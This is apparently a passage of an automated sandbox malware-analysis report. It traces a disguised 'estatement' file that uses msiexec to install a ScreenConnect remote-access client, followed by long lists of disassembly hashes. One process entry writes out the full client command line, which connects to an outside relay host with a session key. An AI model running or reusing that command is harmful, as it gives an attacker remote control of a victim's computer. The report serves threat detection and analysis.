                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:14:00:04
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 033BA5D71B7F944453A970924D39DAE7
                                                                                                                          Imagebase:0xb80000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:6
                                                                                                                          Start time:14:00:04
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 866783798F001865CAC127B6D020676D E Global\MSI0000
                                                                                                                          Imagebase:0xb80000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:7
                                                                                                                          Start time:14:00:04
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=c9e2cffd-3b6b-48ba-b186-2346c9437d68&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c="
                                                                                                                          Imagebase:0x2f0000
                                                                                                                          File size:95'512 bytes
                                                                                                                          MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:8
                                                                                                                          Start time:14:00:06
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "8a895d2b-ac11-46ab-97d1-949397ce5283" "User"
                                                                                                                          Imagebase:0xd30000
                                                                                                                          File size:602'392 bytes
                                                                                                                          MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.3571728405.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:9
                                                                                                                          Start time:14:00:08
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:10
                                                                                                                          Start time:14:00:10
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "bff281c5-2f25-4369-bbf2-587ffb428846" "System"
                                                                                                                          Imagebase:0xfe0000
                                                                                                                          File size:602'392 bytes
                                                                                                                          MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1832786752.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:true

                                                                                                                          Reset < >
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #!$K6$7
                                                                                                                            • API String ID: 0-185628103
                                                                                                                            • Opcode ID: f06923a3c3a0bc5f0141a9dd214d415b36a526b42bfe246d021b057826bcdf8d
                                                                                                                            • Instruction ID: 5c10a3f90e5178c9f092c0908d2889dfa0b581d70b3b7be71990433815a703eb
                                                                                                                            • Opcode Fuzzy Hash: f06923a3c3a0bc5f0141a9dd214d415b36a526b42bfe246d021b057826bcdf8d
                                                                                                                            • Instruction Fuzzy Hash: B55180713042115FD710AA7DE998A6EB7E7FBC93103518639E426CB348EFB4DD4A8B81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #!$K6$7
                                                                                                                            • API String ID: 0-185628103
                                                                                                                            • Opcode ID: 3b8b15b7ab1595e9393803f9702db4d84c41a3177790de23db3691a58e412e18
                                                                                                                            • Instruction ID: dcc9208821c7eb34abd997ec5e3db456fa398ced810003d854d8f1b4c664bab5
                                                                                                                            • Opcode Fuzzy Hash: 3b8b15b7ab1595e9393803f9702db4d84c41a3177790de23db3691a58e412e18
                                                                                                                            • Instruction Fuzzy Hash: 395181713042114FD714AA7DE998A6EB6E7FBC93103518639E426CB34CEFB0DD498B81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (bq$Hbq
                                                                                                                            • API String ID: 0-4081012451
                                                                                                                            • Opcode ID: 9618293da38fdf49951dd779ca87bf6cdbc0267b35f5cc0d4fa53845accf7404
                                                                                                                            • Instruction ID: 06ac689bd836d2fab66f91abfa0a4e14ac24f5fc6480e12bc69a18f95d62cce3
                                                                                                                            • Opcode Fuzzy Hash: 9618293da38fdf49951dd779ca87bf6cdbc0267b35f5cc0d4fa53845accf7404
                                                                                                                            • Instruction Fuzzy Hash: 7F41BF35B011598FCB04AE69D494A6EBBE6FFC4350F14882AE809CB348DF34DD418BA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (bq
                                                                                                                            • API String ID: 0-149360118
                                                                                                                            • Opcode ID: 2c0eb30260821d91716fdd3f525f6cedf488e1bdf6a3cb17bd56b0a2cfb42d1f
                                                                                                                            • Instruction ID: 03d060429dade4234dd7b6a77498668661f9aa797c2f1d82ccdb052f99482400
                                                                                                                            • Opcode Fuzzy Hash: 2c0eb30260821d91716fdd3f525f6cedf488e1bdf6a3cb17bd56b0a2cfb42d1f
                                                                                                                            • Instruction Fuzzy Hash: 4A610A34B116159FCB04DFA8E99496EB7F6FF8D314B1081A9E506AB369DB30EC01DB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (bq
                                                                                                                            • API String ID: 0-149360118
                                                                                                                            • Opcode ID: 88229be5e376f77eb7ae995a205593d090c2ab8e0cb718470ffb53974fb94554
                                                                                                                            • Instruction ID: bbfe1de0d345ac48f611f6d0d0f84893c82efda5c82484b9afc36d4168289300
                                                                                                                            • Opcode Fuzzy Hash: 88229be5e376f77eb7ae995a205593d090c2ab8e0cb718470ffb53974fb94554
                                                                                                                            • Instruction Fuzzy Hash: 3F11D0363002108FCB14DB58E885B6AB7E6FBCC324B20812DE41AC7755DE36EC028B91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (bq
                                                                                                                            • API String ID: 0-149360118
                                                                                                                            • Opcode ID: 51086a617ad2585c77a77706e714d28ae02fed8ec458f202edda2b588bc5a0bb
                                                                                                                            • Instruction ID: ae3b0538a50bd7bbfcd5cdf6e93c762b1b06f9bc0f2c6f4b6b78e0fe113793ce
                                                                                                                            • Opcode Fuzzy Hash: 51086a617ad2585c77a77706e714d28ae02fed8ec458f202edda2b588bc5a0bb
                                                                                                                            • Instruction Fuzzy Hash: AA11BF363002148FCB18DB5DE890A2A7BE6FFC9324B20842DE41AC7755DE36EC018B51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Te^q
                                                                                                                            • API String ID: 0-671973202
                                                                                                                            • Opcode ID: 5a23f107185afc6ad3081418a40b311b11d178cc70c347ccf15fb2e297e15593
                                                                                                                            • Instruction ID: 9b6b471ab08811e4141cd4996ffb6237d7e84d1a4a43bb30a240f363016857eb
                                                                                                                            • Opcode Fuzzy Hash: 5a23f107185afc6ad3081418a40b311b11d178cc70c347ccf15fb2e297e15593
                                                                                                                            • Instruction Fuzzy Hash: 99F0BB327001105BD614D65D9CC0FABB7D7EBC8350B14852AF509CB355CD31DC0687A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Te^q
                                                                                                                            • API String ID: 0-671973202
                                                                                                                            • Opcode ID: 286c68d8cf4793549380a34f2206ea8a01768055d49b56d5fc0d4feee4b5efb2
                                                                                                                            • Instruction ID: c746370544ff96fbe43b671b108377d4823fa28f2dbc3cf4389f1688d50908b8
                                                                                                                            • Opcode Fuzzy Hash: 286c68d8cf4793549380a34f2206ea8a01768055d49b56d5fc0d4feee4b5efb2
                                                                                                                            • Instruction Fuzzy Hash: 80F089313001146BC614DA9D9890D6BF79AEFC9760714852AF909CB355CD71DC0687E1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PH^q
                                                                                                                            • API String ID: 0-2549759414
                                                                                                                            • Opcode ID: 9e4c80ae4f2e527327d775c954c9f26bac529a0673abbbfe3da55315eb8c3f38
                                                                                                                            • Instruction ID: c64d3c34d8eb87569a61932a2f5c33a14f24296e496822331e0591a3003b063e
                                                                                                                            • Opcode Fuzzy Hash: 9e4c80ae4f2e527327d775c954c9f26bac529a0673abbbfe3da55315eb8c3f38
                                                                                                                            • Instruction Fuzzy Hash: EBD02BB150838457CF046F74F94835A7BD6BB81310F78096C9491CA7F2EE66D402C691
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PH^q
                                                                                                                            • API String ID: 0-2549759414
                                                                                                                            • Opcode ID: f1d63bafe3040ebd1dcc80741b59332db2dab1bf214b2570290caf45c3d50974
                                                                                                                            • Instruction ID: d2b48a560a260ac13c31e319514d29b95672b280bdc4ca9427a05f02425e0bf8
                                                                                                                            • Opcode Fuzzy Hash: f1d63bafe3040ebd1dcc80741b59332db2dab1bf214b2570290caf45c3d50974
                                                                                                                            • Instruction Fuzzy Hash: 12C02230200348878E086FB8AA080213789BB81320B300A1C98208F2C5DB32D8038AA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4a567a80447c2a95cc6a8384c7c08e2c5da2e511dfdac45ae281f28b6d42f9d8
                                                                                                                            • Instruction ID: 2b362694a0ecfa72dd7c0a9aefc04341fb7ab4351aa3456be26d224d1140d1c0
                                                                                                                            • Opcode Fuzzy Hash: 4a567a80447c2a95cc6a8384c7c08e2c5da2e511dfdac45ae281f28b6d42f9d8
                                                                                                                            • Instruction Fuzzy Hash: 59D10635A0160A9FCF01CFA8D9808AEBBB6FF49314B248459F915AB365D731ED15CFA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 81cadf0842c417df87e0e660d308278cd100649c10141725fdf80f5405e37f72
                                                                                                                            • Instruction ID: 27f8f66421b6a4cc6ef3dc9281a67bb2f81bec95b2ea08a7570fe33a7835aed0
                                                                                                                            • Opcode Fuzzy Hash: 81cadf0842c417df87e0e660d308278cd100649c10141725fdf80f5405e37f72
                                                                                                                            • Instruction Fuzzy Hash: 67A15C74B402059FCB05EB69E995A6EBBF2FF88300B148529E50ADB359DF70DC46CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4b16f114a7c133567d54e4ee1637b66e386838baa4cf6c28bbdb93a34d297919
                                                                                                                            • Instruction ID: a90b1d417bdfb2f2e1649cafbefd4bee66578551c4d2a9451610c974eb644d0d
                                                                                                                            • Opcode Fuzzy Hash: 4b16f114a7c133567d54e4ee1637b66e386838baa4cf6c28bbdb93a34d297919
                                                                                                                            • Instruction Fuzzy Hash: F3914B74B402059FCB05EB69E999A6EBBF2FF88300B148529E51ADB359DF70DC46CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8ea2eccdf711e09de15fcd4c8847f16907ea5fc69a6ec9a87b50e74a7a4e5c48
                                                                                                                            • Instruction ID: 1575a6cf95f0bae9ecad7fa5da30c13a0bf785d37b5d0e477732e4e2158f5b66
                                                                                                                            • Opcode Fuzzy Hash: 8ea2eccdf711e09de15fcd4c8847f16907ea5fc69a6ec9a87b50e74a7a4e5c48
                                                                                                                            • Instruction Fuzzy Hash: 37913A70A006158FCB54DF69E98469EBBF6FF88310B158629E8059F359DBB0ED46CF80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e414f75db943a9d800c8634050eb4fdc9d9ff2b72ec68095c0a1e8e34f03aca2
                                                                                                                            • Instruction ID: 0ac1b759917cd23582772573f56bd24aa12db03ca09b4d45562b234b49c5f464
                                                                                                                            • Opcode Fuzzy Hash: e414f75db943a9d800c8634050eb4fdc9d9ff2b72ec68095c0a1e8e34f03aca2
                                                                                                                            • Instruction Fuzzy Hash: ED619F31B006058FCB04DF69E9845AEBBF6FF89310724856AE50AEB355DF71EC068B51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c9efd7dad45c72637a601fc2069eb0c56d620949c3b6f836a34ef0695e9b59dc
                                                                                                                            • Instruction ID: fbe928367610c43d044b55660e6657d8e2bb2d9cad03da89d4f69b9536bc18d6
                                                                                                                            • Opcode Fuzzy Hash: c9efd7dad45c72637a601fc2069eb0c56d620949c3b6f836a34ef0695e9b59dc
                                                                                                                            • Instruction Fuzzy Hash: 05513D35A10619CFCB44CFA9C88499DBBF6FF8A700B25816AE505EF321DB71AD05CB40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9dbef4cfd7ca62c1454e7e81e2d07c345973280b021d9ea6b12048170530c558
                                                                                                                            • Instruction ID: acfc810048fc1cf4af15cf9d23dfddefe1782d03dfb2add34fa52714215cd241
                                                                                                                            • Opcode Fuzzy Hash: 9dbef4cfd7ca62c1454e7e81e2d07c345973280b021d9ea6b12048170530c558
                                                                                                                            • Instruction Fuzzy Hash: 00515E70E503099FDB05EFB8D844BDDBBB5FF88300F109629E114AB254EB75A989CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ab44de711b461e97191672997108fdb146ae6bac132c60bec0fd51becd48c6ad
                                                                                                                            • Instruction ID: 6eac58694fcf8a0bb21f67c5df080c81b76916925e6d3cae0ec2e204942165eb
                                                                                                                            • Opcode Fuzzy Hash: ab44de711b461e97191672997108fdb146ae6bac132c60bec0fd51becd48c6ad
                                                                                                                            • Instruction Fuzzy Hash: EB5118306006118FCB18DF69E8D866B7BA6FF89321B154598E8159F3A9DB30EC52CF90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 87304682dbb1bd5db9bffc2898f5eb8ffed8441de241654df8da2a37b524cd73
                                                                                                                            • Instruction ID: ee39e9f70f8569221d13c6d1784f6e3ccddd050bfb7f38252e14871ba5b2cd65
                                                                                                                            • Opcode Fuzzy Hash: 87304682dbb1bd5db9bffc2898f5eb8ffed8441de241654df8da2a37b524cd73
                                                                                                                            • Instruction Fuzzy Hash: C8416E4781EAF18BE709166CB8652C12F90DA7331476F5087C5A4CF27FE098940AD7E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: beccd522b5ffe992a09210bfc3a71e3adf3ecd8110864d81b2649f59d9044400
                                                                                                                            • Instruction ID: e17ab52466ed21c1a32504d2a60f8b6121b5f424e9aa664f45ea1291c6a4f39b
                                                                                                                            • Opcode Fuzzy Hash: beccd522b5ffe992a09210bfc3a71e3adf3ecd8110864d81b2649f59d9044400
                                                                                                                            • Instruction Fuzzy Hash: DC514F70E503099FDB05EFB8D884BDDBBB5FF88300F108629E514AB254EB75A989CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 76e00671b2748412c45fa8862480d0a284ef11d8c505f50c214702c68497239d
                                                                                                                            • Instruction ID: e59ba7eaf91d33f2761e422ec89ddb00262580fd43858b6f0430131a343442a0
                                                                                                                            • Opcode Fuzzy Hash: 76e00671b2748412c45fa8862480d0a284ef11d8c505f50c214702c68497239d
                                                                                                                            • Instruction Fuzzy Hash: 69411634B012159FCB14CF98E894A6A7BFAFBCC310B658059E905DB318DB35ED02DB61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1bec7f70d1b7c3c00d439b04fcf3d5b6dc644bbd5221b2dacf23bc58c647eee7
                                                                                                                            • Instruction ID: f4975fab2cd8870e075d80bad5e9b4c88bf96bb800c9c5149a4b17f0166fd4a6
                                                                                                                            • Opcode Fuzzy Hash: 1bec7f70d1b7c3c00d439b04fcf3d5b6dc644bbd5221b2dacf23bc58c647eee7
                                                                                                                            • Instruction Fuzzy Hash: C4414A306002158FCF18DF29E8D865A7BB5FF89325B1485A9D8119F3A9DB30ED52CF91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ac5a6f64a4d0b8f829bf6da026565fd9aa0bdbff25e73e54c9eb010481b94a5d
                                                                                                                            • Instruction ID: 7aac59267d1061ff0a5359e6b892c0da49b94a5352ec485cff3af9bb4dbd22f8
                                                                                                                            • Opcode Fuzzy Hash: ac5a6f64a4d0b8f829bf6da026565fd9aa0bdbff25e73e54c9eb010481b94a5d
                                                                                                                            • Instruction Fuzzy Hash: 62315B31B002268FDB14DF69D4986AEBBF6EF89354F104469E506EB398DF74EC008B91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f55b103a378401df6f7fcbcf4268ffe0a4170ebae6791bd29fc810893bde4fd6
                                                                                                                            • Instruction ID: d810098f25001bf11906074e93a16ade75b0d82f10389e056223ec97ec233cad
                                                                                                                            • Opcode Fuzzy Hash: f55b103a378401df6f7fcbcf4268ffe0a4170ebae6791bd29fc810893bde4fd6
                                                                                                                            • Instruction Fuzzy Hash: 1D418274E012199FCB58DFAAD940AEEBBF2BF88300F14812AE818A7355DB345942CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1709940551.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_920000_estatement020134230003.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0b95c36bd8fe3cc177cf1d27c5b1f900ee8a0e21c1e730bc19bad920bd4968cf
